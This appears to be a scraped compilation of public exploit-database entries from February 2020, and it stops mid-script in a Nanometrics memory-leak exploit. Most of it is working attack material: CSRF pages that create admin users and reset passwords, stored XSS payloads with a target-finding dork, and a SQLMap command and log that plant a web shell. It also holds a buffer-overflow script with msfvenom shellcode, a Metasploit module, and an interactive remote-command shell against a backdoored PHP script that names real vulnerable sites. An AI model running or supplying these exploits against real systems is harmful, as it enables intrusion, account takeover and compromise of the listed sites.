ISHACK AI BOT

# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path # Exploit Author: boku # Date: 2020-02-10 # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe # Version: 2.0.1214 # Tested On: Windows 10 (32-bit) C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """ BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto C:\Users\user>sc qc "BOOTP Turbo" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BOOTP Turbo TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BOOTP Turbo DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem

# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation # Author: nu11secur1ty # Date: 2020-02-14 # Vendor: Microsoft # Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty # CVE: CVE-2020-0683 [+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) [+] Website: https://www.nu11secur1ty.com/ [+] Source: readme from GitHUB [+] twitter.com/nu11secur1ty [Exploit Program] Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty [Vendor] Microsoft [Vulnerability Type] Windows Installer Elevation of Privilege Vulnerability [CVE Reference] An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and add or remove files. The security update addresses the vulnerability by modifying how to reparse points are handled by the Windows Installer. [Security Issue] Elevation of Privilege from user to C:\Windows\administartion execution files [References] # CVE-2020-0683 Original Poc sent to MSRC. Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683 Source code for Visual Studio C++ 2019 Inside "nu11secur1ty" you'll find the exploit (exe) to execute. # Note: This test is using `system.ini` in c:\Windows\system.ini When you exploit this file you should replace with the original file `system.ini` after this test, which you will find in CVE-2020-0683 directory :) -------------------------------------------------------------------------- - - How to run the exploit Go into "nu11secur1ty" directory and from a cmd console launch: - for the test MsiExploit.exe c:\Windows\system.ini" Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory. - Disclaimer: The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. - @nu11secur1ty [Network Access] Local [Disclosure Timeline] 02/11/2020 [Disclaimer] The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. nu11secur1ty --

Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: https://www.weird-solutions.com Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe Version: 4.6.1298 Tested On: Windows 10 (32-bit) C:\Users\user>sc qc "DHCP Turbo 4" SERVICE_NAME: DHCP Turbo 4 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DHCP Turbo 4 DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo" DisplayName PathName StartMode DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto

# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://icehrm.com/ # Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0 # Tested on Windows 10/Kali Rolling # The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change: # POC for user creation: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTHERE/icehrm/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="saveUser" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"username"&#58;"test"&#44;"email"&#58;"test&#64;test&#46;com"&#44;"employee"&#58;"1"&#44;"user&#95;level"&#58;"Admin"&#44;"user&#95;roles"&#58;"&#91;&#92;"2&#92;"&#93;"&#44;"lang"&#58;"NULL"&#44;"default&#95;module"&#58;"NULL"&#44;"csrf"&#58;"c0bdded55472fab56c578386143a1854e6f8dd11"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html> # POC for Password Change: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTHERE/icehrm/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"admin123"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting # Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply" # Date: 2020-02-14 # Category : Webapps # Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip # Vendor Homepage: https://github.com/Fruitfulcode/Fruitful # Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) # Team Members: Behzad Khalifeh , Milad Ranjbar # Version: 3.8 # Tested on: Windows/Linux # CVE: N/A .:: Theme Description ::. Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With above Dork. Step 2 - Inject Your Java Script Codes to Name & Email Fields Step 3 - Click Post Comment .:: Tested Payload ::. '>"><script>alert(/XSS By UltraSecurity/)</script> .:: Post Request ::. comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145

# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path # Exploit Author: boku # Date: 2020-02-10 # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe # Version: 4.6.1273 # Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """ TFTP Turbo 4 C:\Program Files\TFTP Turbo 4\tftpt.exe Auto C:\Users\nightelf>sc qc "TFTP Turbo 4" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: TFTP Turbo 4 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\TFTP Turbo 4\tftpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TFTP Turbo 4 DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem

# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User) # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling # The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary # user creation and for changing passwords (Specifically the admin password) # POC For aribtrary user creation: # CSRF POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST"> <input type="hidden" name="xajax" value="submitFormUser" /> <input type="hidden" name="xajaxr" value="1581700271752" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="1" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Test" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" /> <input type="submit" value="Submit request" /> </form> </body> </html> # POC for admin password change: # CSRF POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST"> <input type="hidden" name="xajax" value="submitFormProfil" /> <input type="hidden" name="xajaxr" value="1581702103306" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="fr" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection # Date: 2020-02-14 # Exploit Author: J3rryBl4nks, Homebrewer # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution. Exploit POC: Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection. Save the admin hash and insert it into SQLMap as such: sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell\ Now you have a web shell uploaded to the server: 11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests: --- Parameter: users (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3 Type: UNION query Title: MySQL UNION query (NULL) - 42 columns Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3 --- [11:53:02] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.2.26 back-end DBMS: MySQL >= 5.0.12 [11:53:02] [INFO] going to use a web backdoor for command prompt [11:53:02] [INFO] fingerprinting the back-end DBMS operating system [11:53:02] [INFO] the back-end DBMS operating system is Windows which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > 4 do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n [11:53:07] [WARNING] unable to automatically retrieve the web server document root what do you want to use for writable directory? [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 2 please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www [11:53:23] [WARNING] unable to automatically parse any web server path [11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method [11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' [11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method [11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query [11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B) [11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php Using that webshell you can upload your reverse shell. Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist.

# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow # Exploit Author: boku # Date: 2020-02-14 # Vendor Homepage: https://en.softonic.com/author/pxcompany # Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download # Version: 5.0 # Tested On: Windows 10 (32-bit) # # Recreate: # 1) Install & Open Cuckoo Clock v5.0 # 2) Right Click app icon (bottom right), click Alarms # 3) Click the Add Button # 4) Run Python script # 5) Open generated poc.txt, then select-all & copy-all # 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer # 7) Press Back Button and shellcode will execute # EIP Overwrite at 260 Bytes # Max Buffer space is 1287 bytes # ESP points to payload at offset 264 bytes # EBP overwrite at 256 bytes # badChars = '\x00\x0d' try: ebpOffset = '\x41'*256 ebp = '\x42\x42\x42\x42' eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll] # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll) # ESP points to payload at offset 264 bytes # 1019 bytes = Remaining Buffer Length fixStack = '\x89\xE5' # mov ebp,esp fixStack += '\x83\xEC\x30' # sub esp,byte +0x30 # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode # x86/shikata_ga_nai chosen with final size 216 shellcode = b"" shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4" shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14" shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96" shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a" shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64" shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35" shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34" shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32" shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a" shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d" shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3" shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f" shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c" shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4" shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55" shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a" shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56" shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb" shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48" shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68" Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode)) payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder File = 'poc.txt' f = open(File, 'w') f.write(payload) f.close() print File + " created successfully" except: print File + ' failed to create'

# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting # Date: 2020-02-15 # Exploit Author: Shahab.ra.9 # Vendor Homepage: https://products-filter.com/ # Software Link: https://wordpress.org/plugins/woocommerce-products-filter/ # Version: 1.2.3 # Tested on: windows 10 # WOOF - Products Filter for WooCommerce Exploit: http://target/wp-admin/admin.php?page=wc-settings&tab=woof now in tab "design" -> then enter (xss code) in the (textfields) front side ->(Text for block toggle ,Text for block toggle , Custom front css styles file link). then click on button "save changes". then refresh page ,now you see the execution of xss code ,then refersh frontend page site -> "http://target/shop/ " or frontend pages used this plugin the execution of xss code. Demo Poc: http://target/wp-admin/admin.php?page=wc-settings&tab=woof now in tab "design" -> then enter ( ";</script><img src=1 onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1 ) in the (textfields) front side ->(Text for block toggle ,Text for block toggle and Custom front css styles file link). then click on button "save changes".

# Exploit Title: LabVantage 8.3 - Information Disclosure # Google Dork: N/A # Date: 2020-02-16 # Exploit Author: Joel Aviad Ossi # Vendor Homepage: labvantage.com # Software Link: N/A # Version: LabVantage 8.3 # Tested on: * # CVE : N/A import requests import operator def exploit(target): print("[+] Fetching LabVantage Database Name..") start = "name=\"database\" id=\"database\" value=\"" end = "\" >" vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\"" vend = "viewportTest" print("[+] Testing URL: " + target) r = requests.get(target) memory = r.text print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)]) print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71]) print("[+] Vulnerable!") def vuln_check(): target = input("\nTARGET HOST URL (example: target.com:8080): ") print('[+] Checking if Host is vulnerable.') target = (str(target) + "/labservices/logon.jsp") r = requests.get(target) memory = r.text s = "name=\"database\" id=\"database\" value=\"" if not operator.contains(memory, s): print("[-] Not Vulnerable!") exit(0) else: exploit(target) def attack(): target = input("\nTARGET HOST URL (example: http://target.com:8080): ") enum = input("\nDB NAME TO CHECK: ") headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0', 'Content-Type': 'application/x-www-form-urlencoded'} payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false', '_viewport': 'null', 'username': 'null', 'password': 'null', 'database': ''+str(enum)+'', 'csrftoken': 'null'}) target = (str(target) + "/labservices/rc?command=login") print("[+] Testing URL: " + target) r = requests.post(target, headers=headers, data=payload) memory = r.text start = "Unrecognized" if start in memory: print('[+] DB NOT FOUND!') else: print('[!] NO FOUND!') print("\n1. Vulnerability Check\n2. DB Name Enumeration\n") option = input("CHOSE OPTION: ") if option == "1": vuln_check() elif option == "2": attack() else: print("Wrong option selected, try again!")

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking PACKET_LEN = 10 include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Anviz CrossChex Buffer Overflow', 'Description' => %q{ Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, triggering a stack buffer overflow. }, 'Author' => [ 'Luis Catarino <[email protected]>', # original discovery/exploit 'Pedro Rodrigues <[email protected]>', # original discovery/exploit 'agalway-r7', # Module creation 'adfoster-r7' # Module creation ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-12518'], ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], ['EDB', '47734'] ], 'Payload' => { 'Space' => 8947, 'DisableNops' => true }, 'Arch' => ARCH_X86, 'EncoderType' => Msf::Encoder::Type::Raw, 'Privileged' => true, 'Platform' => 'win', 'DisclosureDate' => '2019-11-28', 'Targets' => [ [ 'Crosschex Standard x86 <= V4.3.12', { 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten 'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data 'Shift' => 4 # Positions payload to be written at beginning of ESP } ] ], 'DefaultTarget' => 0 )) deregister_udp_options register_options( [ Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'), OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100]) ]) end def exploit connect_udp res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil)) if res.empty? fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast") end print_status "CrossChex broadcast received, sending payload in response" sploit = rand_text_english(target['Offset']) sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP sploit << payload.encoded udp_sock.sendto(sploit, host, port) print_status "Payload sent" end end

# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting # Dork:N/A # Date: 2020-02-17 # Exploit Author: UltraSecurityTeam # Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar # Vendor Homepage: UltraSec.Org # Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip # Tested on: Windows/Linux # Version: 1.6.2 .:: Plugin Description ::. An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts .:: Proof Of Concept (PoC) ::. Step 1 - Open WordPress Setting Step 2 - Open Wp Sitemap Page Step 3 - Inject Your Java Script Codes to Exclude pages Step 4 - Click Button Save Changes Step 5 - Run Your Payload .:: Tested Payload ::. '>"><script>alert(/XSS By UltraSecurity/)</script> .:: Post Request ::. option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes

# Exploit title : Virtual Freer 1.58 - Remote Command Execution # Exploit Author : SajjadBnd # Date : 2020-02-17 # Vendor Homepage : http://freer.ir/virtual/ # Software Link : http://www.freer.ir/virtual/download.php?action=get # Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip # Tested on : Ubuntu 19.10 # Version : 1.58 ############################ # [ DESCRIPTION ] # # Free Script For Sell Charging Cards and Virtual Products # # [POC] # # Vulnerable file: /include/libs/nusoap.php # 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']); # # POST /include/libs/nusoap.php # payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a'); # # [ Sample Vulnerable Sites ] # # http://3cure.ir/buy/ # http://cheapcharger.ir/ # http://www.appraworld.ir/ # http://latoon.ir/ # http://novinv.ir/ # import requests import os import sys def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print ''' ################################################# # # # Virtual Freer 1.58 - Remote Command Execution # # SajjadBnd # # BiskooitPedar # # [email protected] # ################################################# ''' def inputs(): target = raw_input('[*] URL : ') while True: try: r = requests.get(target,verify=False) start(target) except requests.exceptions.MissingSchema: target = "http://" + target def start(target): print "======================\n\n[!] Checking: ****()" url = '%s/include/libs/nusoap.php' % (target) body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') if 'vulnerable' in content: print "[+] vulnerable: ****()\n" else: print "[-] Target not Vulnerable!" sys.exit(1) print "\n[!] Checking: System()" body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.decode('utf-8') if 'gid' in content: print "[+] vulnerable: system()\n" osshell(url) else: print "[-] Target not Vulnerable to Running OS Commands!" evalshell(url) def osshell(url): print "======================\n[+] You can run os commands :D\n" while True: try: cmd = raw_input('OS_SHELL $ ') command = "system('%s');" % (cmd) body = {'a74ad8dfacd4f985eb3977517615ce25':command} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') print "\n",content except KeyboardInterrupt: print "\n____________________\n[+] GoodBye :D" sys.exit(1) def evalshell(url): print "======================\n[+] You can just run Eval Commands :D\n" while True: try: cmd = raw_input('\nEval()=> ') command = '%s;' % (cmd) body = {'a74ad8dfacd4f985eb3977517615ce25':command} r = requests.post(url,data=body,allow_redirects=False,timeout=50) content = r.text.encode('utf-8') print "\n",content except KeyboardInterrupt: print "\n____________________\n[+] ok! GoodBye :D" sys.exit(1) if __name__ == '__main__': clear() Banner() inputs()

# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak # Date: 2020-02-15 # Author: byteGoblin # Vendor: https://www.nanometrics.ca # Product: https://www.nanometrics.ca/products/accelerometers/titan-sma # Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder # CVE: N/A # # Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit # # # Vendor: Nanometrics Inc. # Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma # Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder # # Affected versions: # Centaur <= 4.3.23 # TitanSMA <= 4.2.20 # # Summary: # The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists # of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. # Its ease of use simplifies high performance geophysical sensing deplayments in both remote and # networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for # infrasound and similar geophysical sensor recording applications requiring sample rates up to # 5000 sps. # # Summary: # The TitanSMA is a strong motion accelerograph designed for high precision observational and # structural engineering applications, where scientists and engineers require exceptional dynamic # range over a wide frequency band. # # Description: # An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect # critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) # suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. # As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. # Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP # packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system # logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent # packet) which can be combined to leak sensitive data which can be used to perform session hijacking # and authentication bypass scenarios. # # Tested on: # Jetty 9.4.z-SNAPSHOT # # Vulnerability discovered by: # byteGoblin @ zeroscience.mk # # # Advisory ID: ZSL-2020-5562 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php # # Related CVE: CVE-2015-2080 # Related CWE: CWE-532, CWE-538 # # 10.02.2020 # #!/usr/bin/env python3 import requests import re import sys class Goblin: def __init__(self): self.host = None self.page = 